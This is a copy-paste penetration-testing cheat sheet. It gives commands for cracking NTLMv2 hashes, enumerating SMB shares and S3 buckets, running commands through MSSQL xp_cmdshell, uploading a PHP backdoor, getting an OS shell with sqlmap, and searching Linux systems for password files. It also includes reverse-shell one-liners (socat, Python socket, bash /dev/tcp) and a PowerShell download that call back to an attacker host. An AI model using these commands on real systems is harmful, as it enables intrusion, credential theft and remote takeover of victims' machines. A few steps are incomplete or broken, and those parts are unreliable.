Multiple sections with quick hints and cheats to copy/paste.
-> Written with Parrot OS in mind, so locations may differ if you are using a different attack distro.
Passwords #
Password Cracking #
John NTMLv2 (Responder) cracking
john -w=/usr/share/wordlists/rockyou.txt <responder_output>.txt --format=netntlmv2
Windows stuff #
Enumeration #
SMB Share enumeration
smbclient -L <IP_address>
SMB Share content listing
smbclient \\\\<IP_address>\\<share>
Database stuff #
More info:
Connect using known creds with impacket
python3 /usr/share/doc/python3-impacket/examples/ {WINDOMAIN}/{username}:{known_pass}@{IP_address} -windows-auth
if this doesn't work and you're sure the creds are correct try without -windows-auth
Things to try when using
- Is the user admin?
SELECT is_srvrolemember('sysadmin');
- Enable xp_cmdshell:
- List system files:
xp_cmdshell dir
- Who am I:
xp_cmdshell "powershell -c whoami"
- Current working dir:
xp_cmdshell "powershell -c pwd"
- Upload a shell:
xp_cmdshell "powershell -c cd c:\Users\<user>;wget http://<attacker_ip:port>/socat.exe -outfile socat.exe"
NOTE: assumes you know how to host a file on your attack machine with a web server. - Execute a shell:
xp_cmdshell "powershell -c cd c:\users\<user>;.\socat tcp-connect:<attacker_ip>:8999 exec:''cmd.exe'',pty,stderr,setsid,sigint,sane"
NOTE: check the "Shells & Reverse Shells" section for more info - Also note that there's double single quotes around cmd.exe, it's needed!
Mongo DB #
With local access to the a machine that's running Mongo connect to it and see if it's possible to enumerate admins:
mongo --port 27117 {db_name} --eval "db.admin.find().forEach(printjson);"
the output should contain x_shadow
with a hashed version of the user's password.
Web stuff #
Enumeration #
Gobuster enumerate directories
gobuster dir http://location -w /usr/share/wordlists/directory-list-2.3-medium.txt -t 100
Gobuster enumerate vhosts
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://location
S3 Bucket manipulation #
S3Scanner enumerate buckets for custom endpoint ("-u")
s3scanner -u http://s3.custom_location.blah -i scan -f /usr/share/wordlists/BucketNames.txt
For more custom endpoint examples (DO, etc.) check:
AWSCli list insecure custom endpoint bucket contents
aws --endpoint=http://s3.custom_location.bleh s3 ls bucket_name
AWSCli copy PHP shell to bucket
aws --endpoint=http://s3.custom_location_bleh s3 cp /usr/share/webshells/php/qsd-php-backdoor.php s3://bucket_name/images/
SQL Injection #
SQLMap is great but can be noisy, but it's a good start: find an entry point, and get a shell
sqlmap -u 'http://<victim_address>/<vulnerable_page>.php?<query>=any+query' --
cookie="{cookie_authentication_details} --os-shell"
Web Sockets Read:
The most simple way to use WebSockets with sqlmap is to simply use the script discussed in the above url. Make sure to change ws_server
to the actual endoint identified and data
to the vulnerable query. For example if the vulnerable id is "id" change to data = '{"id":"%s"}' % message
Call sqlmap using to identify databases:
sqlmap -u "http://localhost:8081/?id=1" --batch --dbs
Dump the DB contents:
sqlmap -u "http://localhost:8081/?id=1" -D db_name --tables --columns --dump-all
System Checks #
Things to do when you first login to a system
Linux #
- Check user id:
- For every group they're a member:
find / -group {groupname} 2>/dev/null
- Check SUDO rights:
sudo -l
- Check if any of those files are interesting, if they're SUID, etc.
- Find any files that contain the word "passw"
find / -type f -exec grep -il passw {} \; 2>/dev/null
orgrep -irl pass / 2>/dev/null
- Find any files that partially match "passw"
find / -type f -name "*passw*" -ls 2>/dev/null
- Find SUID files that the user can write to and that are Bash, Zsh, Python or Perl scripts
find / -type f -name "*.sh" -o -name "*.zsh" -o -name "*.py" -o -name "*.pl" -perm /u+x -a -perm /u+w -ls 2>/dev/null
- Find SUID files
find / -type f -perm /u+rwx -ls 2>/dev/null
- Run
- Check for vhosts:
cat /etc/hosts
- Check for alt interfaces:
ip addr
Windows #
- check user groups:
whoami /all
- Run
Shells & Reverse Shells #
Easy cheatsheet to generate shells:
Socat Remote Shells #
On the victim (WINDOWS):
socat tcp-connect:<attacker_ip>:8999 exec:'cmd.exe',pty,stderr,setsid,sigint,sane #'cmd.exe' has normal quotes
On the victim (Linux):
socat tcp-connect:<attacker_ip>:8999 exec:'bash -i',pty,stderr,setsid,sigint,sane #'bash' has normal quotes
Alternative using python only:
python -c 'import socket,pty,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<HOST>",8999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn(["/bin/bash","-i"]);'
On the attacker (LINUX):
socat file:`tty`,raw,echo=0 tcp-listen:8999,reuseaddr #`tty` is using backticks
Raw Python & netcat #
The advantage of SOCAT is that it can create a decent shell that funcitons as expected. Assuming you get a reverse shell with netcat but not SOCAT for any reason you can execute the following inside your netcat shell to get a fully functional shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
or create a reverse shell without 3rd party software required:
bash -c "bash -i >& /dev/tcp/{attacker_IP}/443 0>&1"
or to get a functional shell try using the script
command if it's available:
script /dev/null -c bash